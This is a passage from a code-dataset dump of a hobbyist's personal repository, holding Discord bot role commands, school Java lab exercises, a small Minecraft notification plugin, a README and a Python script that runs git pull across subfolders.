10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"ROBLOX\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"skid\":\n\t\t\t\t\t\tmessage.reply(\":x: Use ``.finish`` to add that role. :exclamation: **This will remove you from this channel and send you to the main chat.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"staff\":\n\t\t\t\t\t\tmessage.reply(\":x: We can\\'t just give you the staff role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"super skid\":\n\t\t\t\t\t\tmessage.reply(\":x: Only I can have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"techie\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Techie\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Techie\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"weeb\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Weeb\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Weeb\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"weeaboo\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Weeb\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Weeb\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"wow\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"WoW\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"WoW\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"world of warcraft\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"WoW\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"WoW\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"xbox\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Xbox\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Xbox\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tmessage.reply(\":question: I can't find that role. Did you spell it right?\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase \"finish\":\n\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Skid\"));\n\t\t\t\tmessage.delete();\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\treturn;\n\t\t};\n\t\treturn;\n\t};\n\tswitch (args[0].toLowerCase()) {\n\t\tcase \"help\":\n\t\t\tvar helpEmbed = new Discord.RichEmbed().setThumbnail(client.user.avatarURL).setAuthor('Commands', client.user.avatarURL).setTitle('Command List').setDescription('Commands everyone can use.').setColor(0x1bb80f).addField(prefix + 'help', 'Sends this command.');\n\t\t\tmessage.author.send(helpEmbed);\n\t\t\tbreak;\n\t};\n\tif (message.author.id === zen) {\n\t\tswitch (args[0].toLowerCase()) {\n\t\t\tcase \"famify\":\n\t\t\t\tvar fam = message.mentions.members.first();\n\t\t\t\tif (fam.roles.exists(\"name\", \"Little Boys\")) {\n\t\t\t\t\tmessage.reply(\"That skid is already part of the :triumph::ok_hand::family::sunglasses: **FAM SQUAD** :sunglasses::family::ok_hand::triumph:\");\n\t\t\t\t\treturn;\n\t\t\t\t};\n\t\t\t\tmessage.channel.send(\":triumph: :triumph: THROUGH THE POWER OF GRINDING :triumph: :triumph:\").then(setTimeout(function() {\n\t\t\t\t\tmessage.channel.send(\":ok_hand: :ok_hand: \" + args[1] + \" I HEREBY DEEM YOU... :ok_hand: :ok_hand:\").then(setTimeout(function() {\n\t\t\t\t\t\tmessage.channel.send(\":family: :family: :sunglasses: :sunglasses: PART OF THE FAM :sunglasses: :sunglasses: :family: :family:\");\n\t\t\t\t\t}, 2000));\n\t\t\t\t}, 2000));\n\t\t\t\tfam.addRole(message.member.guild.roles.find(\"name\", \"Little Boys\"));\n\t\t\t\tbreak;\n\t\t};\n\t};\n});\nclient.login(token);\n"
},
{
"alpha_fraction": 0.5553547143936157,
"alphanum_fraction": 0.5643922090530396,
"avg_line_length": 43.71717071533203,
"blob_id": "4bef0dc62e8ecbacefe7aedacd90916281fae483",
"content_id": "1e7c8c1725eee268c41e3dca2207bf284bdbea76",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4426,
"license_type": "permissive",
"max_line_length": 164,
"num_lines": 99,
"path": "/Java/APCSA/ArrayExp.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "/**\n * In this exploratory you will instantiate a 1-D static array, use both loop structures, work with error messages, \n * see the difference between deep and shallow memory values, and swap array elements.\n * \n * @author Mr. Redacted\n * @version 12.15.16\n */\npublic class ArrayExp\n{\n public static void main(String[] args)\n {\n //Create a String array called names and populate it with 11 names. You can do this either with an initializer list \n //or one index at a time.\n String[] names = {\"R\",\"e\",\"d\",\"a\",\"c\",\"t\",\"e\",\"d\",\"!\",\"!!\",\"!!!\"};\n int x = 5;\n int y = 10;\n System.out.println(\"pre-swap x is: \" + x);\n System.out.println(\"pre-swap y is: \" + y);\n swap(x, y);\n System.out.println(\"post-swap x is: \" + x);\n System.out.println(\"post-swap y is: \" + y);\n //Use the 'old' for loop to print every name. Use the 'length' field, not 11. \n for (int i=0;i<names.length;i++) \n System.out.println(names[i]);\n printarray(names);\n //Use the enhanced for..each loop to print every name.\n for (String bruh: names)\n System.out.println(bruh);\n //Use the enhanced for..each loop to change the elements of names and print. Did it work? Why/not?\n for (String hee: names) {\n hee = hee + \" B.\";\n }\n printarray(names); \n //Print 4 random names from the array. Use either a Random object or the random method.\n for (int i=0;i<4;i++) {\n int r = (int) (Math.random() * 11);\n System.out.println(names[r]);\n }\n //Little Johnny is trying to print the last name in your list.\n //Uncomment the next line and look at the error message. What is happening? Fix it so it prints the last name.\n System.out.println(names[names.length - 1]);\n \n //Pass your array to the print statement below. What happened? why?\n //System.out.println(PUT YOUR ARRAY NAME HERE);\n //Fix the issue so that you can print the names in the list - perhaps write a new method (outside the main) and call it.\n \n // You did this for us.\n\n //Correctly swap the first two names in the list and print the list again to check. Write a method for swapping.\n\n arraySwap(names, 0, 10);\n printarray(names);\n \n //Swap every other element using a loop. Elements 0 and 1 should swap, then 2 and 3 , and so on. \n //Being that your list has an odd number of elements, it should not swap the last element.\n //the method should work for any size array > 1. (Use a variable for the ending index)\n \n for (int i=0;i<names.length-1;i+=2) {\n arraySwap(names, i,i+1);\n }\n printarray(names);\n //Write a method called toBetty() that accepts a String array and changes all the names to 'Betty'.\n //names = toBetty(names);\n //printarray(names);\n //OOOOOps!! We have more names to add to the array. Write code with loops (plural) that will put the elements of the two arrays into a third, longer array.\n //These new elements should be at the end of the array.\n // String [] oops = {\"Alpha\", \"Beta\", \"Gamma\", \"Delta\", \"Epsilon\"};\n //Write code that creates an array named 'odds' and stores all odd numbers between -6 and 38 using a for loop. 
\n //Make the array's size exactly large enough to store the numbers.\n \n // printarray(odds);\n /////////////////////////////// END OF FIRST PART OF THE EXPLORATORY //////////////////////////////////\n \n } //END OF MAIN\n //////////////////// PUT METHODS BELOW HERE //////////////////////\n public static void printarray(String[] arr){\n System.out.print(\"[\");\n for(int k = 0; k < arr.length-1; k++)\n System.out.print(arr[k] + \", \"); //no braces needed b/c it's only one line.\n System.out.println( arr[arr.length-1] + \"]\");\n }\n public static void swap(int a, int b) {\n int temp = a;\n a = b;\n b = temp;\n }\n public static void arraySwap(String[] in, int a, int b) {\n String tmp = in[a];\n in[a] = in[b];\n in[b] = tmp;\n }\n public static String[] toBetty(String[] in) {\n String[] n = in;\n for (int i = 0; i < n.length; i++) {\n n[i] = \"Betty\";\n }\n return n;\n }\n} //END OF CLASS"
},
{
"alpha_fraction": 0.7803738117218018,
"alphanum_fraction": 0.7803738117218018,
"avg_line_length": 20.5,
"blob_id": "71ff3ed07c293abbc5667e602bad588cc86fda35",
"content_id": "883e67ef1eb39066c093be8be3e93c3c17f73125",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 214,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 10,
"path": "/Java/MinecraftPlugins/AlylTroll/src/main/java/me/zenisbestwolf/AlylTroll/Main.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "package me.zenisbestwolf.AlylTroll;\n\nimport org.bukkit.plugin.java.JavaPlugin;\nimport me.zenisbestwolf.AlylTroll.Listeners.*;\n\npublic class Main extends JavaPlugin{\n\tpublic void onEnable() {\n\t\tnew Music(this);\n\t}\n}"
},
{
"alpha_fraction": 0.656000018119812,
"alphanum_fraction": 0.6940000057220459,
"avg_line_length": 37.5,
"blob_id": "4d86d4d65b55694682bf6b574ee8d362406e50cf",
"content_id": "2afda805c4f1f7968ab2f13c9fe360d0dd191dc5",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1000,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 26,
"path": "/Java/APCSA/Lab02bvst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab02bvst.java\n// The Mortgage Payment Program\n// This the student, starting version of the Lab02b assignment.\n// Redacted\n\npublic class Lab02bvst\n{\n\tpublic static void main(String[] args)\n\t{\n\t\tSystem.out.println(\"Lab02b, Student Version\\n\");\n\t\tdouble principal = 250000;\n\t\tdouble annualRate = 4.85;\n\t\tdouble numYears = 30;\n\t\tdouble months = numYears*12.0;\n\t\tdouble mR = (annualRate/12.0)/100.0;\n\t\tdouble powerBall = Math.pow(mR+1,months);\n\t\tdouble monthlyPayment = (mR*powerBall/(powerBall-1.0))*principal;\n\t\tdouble roundedMonthlyPayment = Math.ceil(monthlyPayment*100)/100;\n\t\tSystem.out.println(\"Principal: $\" + principal);\n\t\tSystem.out.println(\"Annual Rate: \" + annualRate + \"%\");\n\t\tSystem.out.println(\"Years: \" + numYears);\n\t\tSystem.out.println(\"Monthly Payment: $\" + roundedMonthlyPayment);\n\t\tSystem.out.println(\"Total Payment: $\" + roundedMonthlyPayment * months);\n\t\tSystem.out.println(\"Total Interest: $\" + (roundedMonthlyPayment * months - principal));\n\t}\n}"
},
{
"alpha_fraction": 0.4970308840274811,
"alphanum_fraction": 0.536223292350769,
"avg_line_length": 29.90825653076172,
"blob_id": "6c762e55f75597710caaaa4128e6a21b4864560f",
"content_id": "3298541b373be6cc2d08f1aa38819e9c08dfba9f",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3368,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 109,
"path": "/Java/APCSA/Lab05a2vst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab05a2vst.java\n// The Rational Class Program II\n// This is the student starting version of the Lab05a2 assignment.\nimport java.util.*;\npublic class Lab05a2vst {\n public static void main(String[] args) {\n Scanner s1 = new Scanner(System.in);\n Scanner s2 = new Scanner(System.in);\n Scanner s3 = new Scanner(System.in);\n Scanner s4 = new Scanner(System.in);\n System.out.print(\"\\nEnter the 1st numerator ----> \");\n int num1 = s1.nextInt();\n System.out.print(\"\\nEnter the 1st denominator --> \");\n int den1 = s2.nextInt();\n System.out.print(\"\\nEnter the 2nd numerator ----> \");\n int num2 = s3.nextInt();\n System.out.print(\"\\nEnter the 2nd denominator --> \");\n int den2 = s4.nextInt();\n System.out.println();\n\n Rational r1 = new Rational(num1, den1);\n Rational r2 = new Rational(num2, den2);\n Rational r3 = new Rational();\n\n r3.showMultiply(r1, r2); // required for 80-points\n r3.showDivide(r1, r2); // required for 80-points\n r3.showAdd(r1, r2); // required for 100-points\n r3.showSubtract(r1, r2); // required for 100-points\n }\n}\n\nclass Rational {\n private int num;\n private int den;\n\n // Required for 80-points\n public Rational() {\n num = 0;\n den = 0;\n }\n\n // Required for 80-points\n public Rational(int n, int d) {\n num = n;\n den = d;\n }\n\n // Required for 80-points\n public String getRational() {\n return \"\" + num + \"/\" + den;\n }\n\n // Required for 80-points\n private int getGCF(int n1, int n2) {\n int remainder = 1;\n int gcf = 1;\n while (remainder != 0) {\n remainder = n1 % n2;\n if (remainder == 0) {\n gcf = n2;\n } else {\n n1 = n2;\n n2 = remainder;\n }\n }\n return gcf;\n }\n\n // Required for 80-points\n public String getReduced(int n, int d) {\n int gcf = getGCF(n, d);\n int rNum = n / gcf;\n int rDen = d / gcf;\n return \"\" + rNum + \"/\" + rDen;\n }\n\n // Required for 80-points\n public void showMultiply(Rational r1, Rational r2) {\n int newN = r1.num * r2.num;\n int newD = r1.den * r2.den;\n System.out.println(r1.getRational() + \" * \" + r2.getRational() + \" = \" + getReduced(newN, newD) + \"\\n\");\n }\n\n // Required for 80-points\n public void showDivide(Rational r1, Rational r2) {\n int newN = r1.num * r2.den;\n int newD = r1.den * r2.num;\n System.out.println(r1.getRational() + \" / \" + r2.getRational() + \" = \" + getReduced(newN,newD) + \"\\n\");\n }\n\n // Required for 100-points\n public void showAdd(Rational r1, Rational r2) {\n int tN1 = r1.num * r2.den;\n int tN2 = r2.num * r1.den;\n int newD = r1.den * r2.den;\n int newN = tN1 + tN2;\n System.out.println(r1.getRational() + \" + \" + r2.getRational() + \" = \" + getReduced(newN, newD) + \"\\n\");\n }\n\n // Required for 100-points\n public void showSubtract(Rational r1, Rational r2) {\n int tN1 = r1.num * r2.den;\n int tN2 = r2.num * r1.den;\n int newD = r1.den * r2.den;\n int newN = tN1 - tN2;\n System.out.println(r1.getRational() + \" - \" + r2.getRational() + \" = \" + getReduced(newN, newD) + \"\\n\");\n }\n\n}"
},
{
"alpha_fraction": 0.4658302962779999,
"alphanum_fraction": 0.49125123023986816,
"avg_line_length": 28.134614944458008,
"blob_id": "80c39f5bdb7788f356d018becd64d07ab772e4cc",
"content_id": "ce2dce5f45585bfa52765a3b46194519b1d08b08",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3029,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 104,
"path": "/Java/APCSA/Lab06/Lab06bvst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab06bvst.java\n// This is the student starting file of Lab06a.\n\npublic class Lab06bvst\n{\n public static void main (String[] args)\n {\n System.out.println(\"Lab06bv100 by Redacted\\n\");\n int size = 10;\n School bhs = new School(size);\n String[] names = {\"R\",\"e\",\"d\",\"a\",\"c\",\"t\",\"e\",\"d\",\"!\",\"!!\"};\n int[] ages = {19,23,15,47,27,65,15,19,14,14};\n double[] gpas = {0.4,3.8,4.0,3.0,3.7,2.8,3.9,4.4,3.7,4.0};\n for (int i=0;i<10;i++)\n bhs.addData(names[i], ages[i], gpas[i]);\n System.out.println(\"Original:\\n\" + bhs);\n bhs.bubbleSortGPA();\n System.out.println(\"Bubble Sort by GPA:\\n\" + bhs);\n bhs.bubbleSortAge();\n System.out.println(\"Bubble Sort by Age:\\n\" + bhs);\n bhs.bubbleSortName();\n System.out.println(\"Bubble Sort by Name:\\n\" + bhs);\n } \n}\n\nclass School\n{\n private Student[] students;\n private int size;\n private int used = 0;\n \n public School (int s)\n {\n size = s;\n students = new Student[size];\n }\n \n public void addData(String name, int age, double gpa)\n {\n Student tmp = new Student(name, age, gpa);\n if (used >= size) {\n System.out.println(\"addData of \\\"\" + name + \"\\\" failed, school is full.\");\n } else {\n students[used] = tmp;\n used++;\n }\n } \n public void bubbleSortGPA() {\n boolean sorted = false;\n while (sorted == false) {\n boolean flip = true;\n for (int i=0;i<students.length-1;i++) {\n if (students[i].getGPA() > students[i+1].getGPA()) {\n Student tmp = students[i];\n students[i] = students[i+1];\n students[i+1] = tmp;\n flip = false;\n }\n }\n if (flip == true)\n sorted = true;\n }\n }\n public void bubbleSortAge() {\n boolean sorted = false;\n while (sorted == false) {\n boolean flip = true;\n for (int i=0;i<students.length-1;i++) {\n if (students[i].getAge() > students[i+1].getAge()) {\n Student tmp = students[i];\n students[i] = students[i+1];\n students[i+1] = tmp;\n flip = false;\n }\n }\n if (flip == true)\n sorted = true;\n }\n }\n public void bubbleSortName() {\n boolean sorted = false;\n while (sorted == false) {\n boolean flip = true;\n for (int i = 0; i < students.length - 1; i++) {\n if (students[i].getName().substring(0,1).compareTo(\"A\") > students[i+1].getName().substring(0,1).compareTo(\"A\")) {\n Student tmp = students[i];\n students[i] = students[i + 1];\n students[i + 1] = tmp;\n flip = false;\n }\n }\n if (flip == true)\n sorted = true;\n }\n }\n public String toString()\n {\n String ret = \"\";\n for (int i=0;i<students.length;i++)\n if (students[i] != null)\n ret = ret + students[i];\n return ret;\n }\n}"
},
{
"alpha_fraction": 0.745064377784729,
"alphanum_fraction": 0.750643789768219,
"avg_line_length": 65.57142639160156,
"blob_id": "7d1f9c1ab84bc20de259638915c4287e813c635b",
"content_id": "a240f2ec13ef8e4331ec3ce1848bb1e65b37196f",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2330,
"license_type": "permissive",
"max_line_length": 310,
"num_lines": 35,
"path": "/README.md",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "# toolbox\nRandom scripts and old code I like to keep around. This also serves as an archive for my older code that I sometimes reference but don't host on GitHub anymore.\n\nShould no license be found in the folder in which the code is contained, it is Public Domain (falls under The Unlicense), otherwise please respect the License file included.\n\n## Directory\n\n- Python\n\t- Sort.py\n\t - Prints a list of folders within the given directory, sorted by size (descending).\n\t- PullAll.py\n\t - Runs git pull on all subdirectories where the script is located.\n- Java\n\t- APCSA - All files in here are misc. pieces of Java that I have written for the AP Computer Science A course I completed in the 2019-2020 school year.\n\t- MinecraftPlugins\n\t\t- canyoudumbass\n\t\t\t- Screams at you for placing and breaking blocks, basically just a testing ground for getting block info.\n\t\t- AlylTroll\n\t\t\t- This was a plugin used to tell people when a user played a Disc, for trolling purposes.\n- JavaScript\n\t- DiscordBots\n\t\t- THANOS\n\t\t\t- A small bot I used for fun and wanted to turn into a usable thing, I think? It was at the height of Thanos snapping memes.\n\t\t- furbley\n\t\t\t- Completely do not remember what this was used for. AFAIK it appears to be a direct rip of my bot [Furrtron](https://github.com/ZenIsBestWolf/furrtron) but I included it anyways.\n\t\t- furrtron-test\n\t\t\t- Testing grounds for my bot [Furrtron](https://github.com/ZenIsBestWolf/furrtron), probably one of my best Discord bots for the time. The regular bot is archived at the link provided.\n\t\t- gerald-bot\n\t\t\t- Yet another bot I do not remember creating, at all! I guess this is from May 2020, yet I have 0 recollection of creating it then. It seems to do fuck all.\n\t\t- maddie-test\n\t\t\t- The testing grounds for my first ever Discord bot, [Maddie](https://github.com/ZenIsBestWolf/maddie-bot) which is in archive here on GitHub still. This is how I learned JS, NodeJS, DiscordJS, and got my first real foot into programming. Thank you so much to An Idiot's Guide who taught me this on YouTube.\n\t\t- skid-bot & skid-bot-test\n\t\t\t- I grouped these since they're similar. This was a bot for a server I was trying to make and is similar to [Furrtron](https://github.com/ZenIsBestWolf/furrtron). The \"-test\" version is obviously the testing grounds.\n\t\t- crimp-bot\n\t\t\t- A bot I made for a friend.\n"
},
{
"alpha_fraction": 0.5906228423118591,
"alphanum_fraction": 0.6137158870697021,
"avg_line_length": 46.650001525878906,
"blob_id": "6ca14d4cc9c6294b1c55dfccb9d59874ad209479",
"content_id": "9b46f1923f2b54b6c6612facf136aa17838e92e7",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2858,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 60,
"path": "/Java/APCSA/Lab03vst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab03vst.java\n// The Speeding Ticket Program\n// This the student starting file for Lab03.\nimport java.util.Scanner;\npublic class Lab03vst\n{\n\tpublic static void main(String[] args)\n\t{\n System.out.println(\"Redacted Classmate & Redacted\");\n\t\t System.out.println(\"Lab03, Student Starting Version\\n\");\n System.out.println(\"Speeding Ticket Program\");\n double postedSpeed,goingSpeed,ticket,speedDifference;\n String isSchoolZone,isWorkZone,wasWorkerHit;\n ticket = 0.0;\n Scanner intKeyboard = new Scanner(System.in);\n Scanner strKeyboard = new Scanner(System.in);\n System.out.print(\"Enter posted speed limit ==> \");\n postedSpeed = intKeyboard.nextInt();\n System.out.print(\"Enter actual driving speed ==> \");\n goingSpeed = intKeyboard.nextInt();\n speedDifference = goingSpeed - postedSpeed;\n System.out.println(\"You drove \" + speedDifference + \" over the speed limit.\");\n if (goingSpeed > postedSpeed) {\n ticket+=75.0;\n System.out.println(\"You will receive a speeding ticket.\\nThe minimum ticket is $75.00\");\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Any driving speed higher than 5 miles over the limit\\nadds $10.00 for each mile over the speed limit.\");\n if (speedDifference > 5.0) {\n ticket+=(speedDifference*10.0);\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Any speeding in a school zone doubles the ticket amount.\");\n System.out.print(\"Did speeding happen in a school zone ==> \");\n isSchoolZone = strKeyboard.nextLine();\n if (isSchoolZone.compareToIgnoreCase(\"y\") == 0) {\n ticket*=2.0;\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Any speeding in a work zone doubles the ticket amount.\");\n System.out.print(\"Did speeding happen in a work zone ==> \");\n isWorkZone = strKeyboard.nextLine();\n if (isWorkZone.compareToIgnoreCase(\"y\") == 0) {\n ticket*=2.0;\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Hitting a worker adds $10000.00 to the ticket.\");\n System.out.print(\"Was a worker hit in a work zone ==> \");\n wasWorkerHit = strKeyboard.nextLine();\n if (wasWorkerHit.compareToIgnoreCase(\"y\") == 0) {\n ticket+=10000.0;\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Driving more than 80mph is considered reckless.\\nThis adds $100.00 for every mile over 80 MPH.\");\n if (goingSpeed > 80.0) {\n ticket+=(goingSpeed - 80.0) * 100.0;\n }\n System.out.println(\"\\nYour total ticket is $\" + ticket);\n } \n}"
},
{
"alpha_fraction": 0.6569548845291138,
"alphanum_fraction": 0.6569548845291138,
"avg_line_length": 34.5,
"blob_id": "630eb04853a5aa68a3ac72c7e13bffa0a5422734",
"content_id": "da34006dafc3770583ce419be216da120b0b5be1",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1064,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 30,
"path": "/Java/MinecraftPlugins/AlylTroll/src/main/java/me/zenisbestwolf/AlylTroll/Listeners/Music.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "package me.zenisbestwolf.AlylTroll.Listeners;\n\nimport org.bukkit.Bukkit;\nimport org.bukkit.event.EventHandler;\nimport org.bukkit.event.Listener;\nimport org.bukkit.event.player.PlayerInteractEvent;\nimport org.bukkit.entity.Player;\nimport org.bukkit.event.block.Action;\n\nimport me.zenisbestwolf.AlylTroll.Main;\n\npublic class Music implements Listener {\n private static Main plugin;\n public Music(Main plugin) {\n this.plugin = plugin;\n Bukkit.getPluginManager().registerEvents(this, plugin);\n }\n \n @EventHandler\n public void onPlay(PlayerInteractEvent e) {\n String alyl = \"Alyl\";\n if (e.getPlayer().getName().equals(alyl) && e.getClickedBlock().getType().toString().equals(\"JUKEBOX\") && e.getAction() == Action.RIGHT_CLICK_BLOCK && e.getMaterial().isRecord()) {\n for(Player p : plugin.getServer().getOnlinePlayers()) {\n if (p.hasPermission(\"fuck.off\")) {\n p.sendMessage(\"Alyl has begun playing \" + e.getMaterial().toString());\n }\n }\n }\n }\n}"
},
{
"alpha_fraction": 0.6698564887046814,
"alphanum_fraction": 0.6722487807273865,
"avg_line_length": 31.153846740722656,
"blob_id": "faa42070e6170b9c6bff2c4a0428dd813ae9128d",
"content_id": "373cf58fb2518ae3327dae0659cf6742da22bade",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 13,
"path": "/Python/PullAll.py",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "# Runs git pull on all subdirectories where the script is located.\nimport os\nprint(\"Running git pull on all subdirectories...\")\ntmpfol = []\nfor r, d, f in os.walk(os.curdir): # Walk around the directory.\n\ttmpfol.append(d) # Only add the folders in the directory.\nfolders = tmpfol[0]\nfor i in folders:\n os.chdir(i)\n print(\"Running git pull on \" + i)\n os.system(\"git pull\")\n print(\"Done\")\n os.chdir(\"..\")\n"
},
{
"alpha_fraction": 0.6013237237930298,
"alphanum_fraction": 0.6163130402565002,
"avg_line_length": 24.94444465637207,
"blob_id": "d54ff3c6481b2d88dd7b10f54a98e2516ef42145",
